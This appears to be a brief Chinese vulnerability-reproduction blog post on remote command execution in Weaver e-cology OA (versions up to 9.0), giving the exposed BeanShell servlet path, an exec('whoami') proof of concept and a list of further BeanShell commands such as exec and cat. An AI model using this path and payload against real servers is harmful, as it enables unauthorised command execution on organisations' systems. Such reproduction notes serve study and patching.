靶机

影响版本 泛微e-cology<=9.0

https://github.com/jas502n/e-cology

部署

复现

/weaver/bsh.servlet.BshServlet

POC

exec("whoami")

这是BeanShell命令的其他一些示例

source（），run（）-将bsh脚本读入该解释器，或在新的解释器中运行

frame（）-在Frame或JFrame中显示GUI组件。

load（），save（）-将可序列化的对象加载或保存到文件中。

cd（），cat（），dir（），pwd（）等-类似于Unix的shell命令

exec（）-运行本机应用程序

javap（）-打印对象的方法和字段，类似于Java javap命令的输出。

setAccessibility（）-打开对私有组件和受保护组件的无限制访问。

参考:https://github.com/jas502n/e-cology

最新文章

1. Map的keySet和entrySet
2. 2014优秀的好用的20款免费jQuery插件推荐
3. Hadoop出现 native snappy library not available: SnappyCompressor has not been loaded的解决办法
4. Matlab计算两集合间的海明距离
5. postgresql 的触发器
6. JavaScript类数组对象参考
7. Atitit.ALT+TAB没反应车and 点击任务栏程序闪烁可是不能切换
8. POJ 2484 A Funny Game
9. Fibonacci数列前n项值的输出（运用递归算法）
10. CathyCMS-后台管理v1.0
11. 一个php技术栈后端猿的知识储备大纲
12. python_如何拆分含有多种分隔符的字符串?
13. 一个你不能错过的第三方.net集合库
14. FontAwesome 图标字体库的使用
15. 微信昵称有特殊符号怎么保存到mysql库里？
16. ES5数组的遍历方式
17. Linux架构分布式集群之基础篇
18. 前台框架vue.js中怎样嵌入 Echarts 组件？
19. http协议 put、delete请求asp.net mvc应用，报404错误
20. 选择问题（选择数组中第K小的数）

热门文章

1. require 和 import 详解
2. Python3之Django Web框架中间件？？？
3. Spark Streaming Transformations
4. vue.js（12）--过滤器
5. openstack stein部署手册 7. nova-compute
6. Spring Boot 全局排除 spring-boot-starter-logging 依赖
7. tpcc-mysql测试mysql5.6 （EXT4文件系统）
8. wangeditor 支持上传视频版
9. TFrecords读、写图片文件
10. 日志管理工具logrotate